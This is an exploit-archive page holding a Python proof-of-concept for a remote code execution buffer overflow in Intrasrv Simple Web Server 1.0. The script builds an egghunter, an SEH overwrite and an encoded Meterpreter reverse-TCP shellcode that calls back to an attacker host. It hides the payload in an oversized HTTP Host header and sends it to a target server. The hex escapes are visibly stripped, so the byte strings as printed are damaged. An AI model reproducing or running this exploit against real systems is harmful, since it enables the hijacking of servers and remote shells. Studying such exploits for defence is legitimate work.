Home / exploitsPDF  

Intrasrv Simple Web Server 1.0 Code Execution

Posted on 31 May 2013

# Exploit Title: Intrasrv Simple Web Server 1.0 SEH based Remote Code Execution BOF

# Date: 29.05.2013

# Exploit Author: xis_one@STM Solutions

# Vendor Homepage: http://www.leighb.com/intrasrv.htm

# Software Link: http://www.leighb.com/intrasrv.zip

# Version: 1.0

# Tested on: Windows XP SP3 Eng

# Movie:http://www.youtube.com/watch?v=NvCPYA6T9l0&feature=youtu.be

#!/usr/bin/python

import socket

import os

import sys

target="192.168.1.16"

#W00T

egghunter="x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x54x30x30x57x89xd7xafx75xeaxafx75xe7xffxe7" + "x90"*94

nseh="xEBx80x90x90"#jmp back do egghunter

seh="xddx97x40x00" #0x004097dd, # pop eax # pop ebp # ret - intrasrv.exe

crash = "x90"*1427 + egghunter + nseh + seh + "x90"*2439 #4000 bytes

#windows/meterpreter/reverse_tcp lhost=192.168.1.15 lport=31337 R | msfencode -t c -b 'x56' -e x86/alpha_mixed

shellcode = ("T00WT00W" +

"x89xe2xdaxcfxd9x72xf4x58x50x59x49x49x49x49x49"

"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"

"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"

"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"

"x59x6cx4bx58x4ex69x47x70x55x50x53x30x75x30x4e"

"x69x6bx55x64x71x78x52x73x54x4ex6bx51x42x64x70"

"x4ex6bx32x72x44x4cx6ex6bx62x72x45x44x6cx4bx30"

"x72x77x58x36x6fx38x37x32x6ax74x66x65x61x79x6f"

"x70x31x49x50x4cx6cx47x4cx63x51x51x6cx65x52x66"

"x4cx71x30x4bx71x48x4fx44x4dx55x51x6ax67x69x72"

"x4cx30x31x42x46x37x4cx4bx33x62x36x70x6ex6bx50"

"x42x75x6cx66x61x6ax70x6ex6bx47x30x51x68x4ex65"

"x69x50x42x54x71x5ax35x51x38x50x52x70x6cx4bx32"

"x68x67x68x4cx4bx71x48x35x70x77x71x39x43x58x63"

"x47x4cx47x39x4cx4bx37x44x4ex6bx65x51x79x46x30"

"x31x49x6fx46x51x59x50x4ex4cx59x51x4ax6fx64x4d"

"x36x61x5ax67x30x38x49x70x34x35x4ax54x55x53x61"

"x6dx39x68x47x4bx73x4dx37x54x32x55x59x72x63x68"

"x4cx4bx32x78x57x54x63x31x59x43x31x76x6cx4bx36"

"x6cx72x6bx4ex6bx33x68x65x4cx65x51x4ax73x6cx4b"

"x44x44x6cx4bx36x61x4ax70x6cx49x61x54x64x64x66"

"x44x61x4bx31x4bx65x31x52x79x51x4ax62x71x69x6f"

"x49x70x46x38x33x6fx53x6ax4ex6bx67x62x58x6bx4e"

"x66x53x6dx35x38x45x63x55x62x33x30x67x70x33x58"

"x53x47x64x33x54x72x31x4fx33x64x72x48x42x6cx31"

"x67x65x76x73x37x6bx4fx39x45x4dx68x5ax30x47x71"

"x37x70x77x70x74x69x59x54x62x74x42x70x42x48x64"

"x69x4bx30x30x6bx37x70x79x6fx58x55x32x70x42x70"

"x30x50x76x30x37x30x42x70x77x30x72x70x63x58x4b"

"x5ax34x4fx39x4fx79x70x79x6fx4ex35x6dx47x33x5a"

"x34x45x71x78x4bx70x6fx58x57x71x46x6fx42x48x54"

"x42x47x70x43x4ax72x49x4ex69x6ax46x31x7ax34x50"

"x31x46x70x57x73x58x6ex79x4fx55x63x44x35x31x6b"

"x4fx69x45x4dx55x6bx70x44x34x74x4cx6bx4fx50x4e"

"x67x78x71x65x4ax4cx63x58x58x70x38x35x49x32x51"

"x46x59x6fx6ex35x51x7ax63x30x70x6ax66x64x53x66"

"x50x57x45x38x44x42x39x49x68x48x43x6fx4bx4fx6e"

"x35x4cx4bx64x76x30x6ax73x70x33x58x73x30x66x70"

"x67x70x55x50x72x76x42x4ax67x70x75x38x63x68x69"

"x34x50x53x68x65x4bx4fx49x45x7ax33x71x43x73x5a"

"x57x70x73x66x61x43x42x77x50x68x63x32x6bx69x79"

"x58x31x4fx39x6fx4ax75x35x51x4fx33x36x49x38x46"

"x4cx45x59x66x42x55x4ax4cx4fx33x41x41")

buffer="GET / HTTP/1.1
"

buffer+="Host: " + crash + "
"

buffer+="Content-Type: application/x-www-form-urlencoded
"

buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1)
"

buffer+="Content-Length: 1048580

"

buffer+=shellcode

one = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )

one.connect((target, 80))

one.send(buffer)

one.close()

 

TOP

Malware :

Exploits :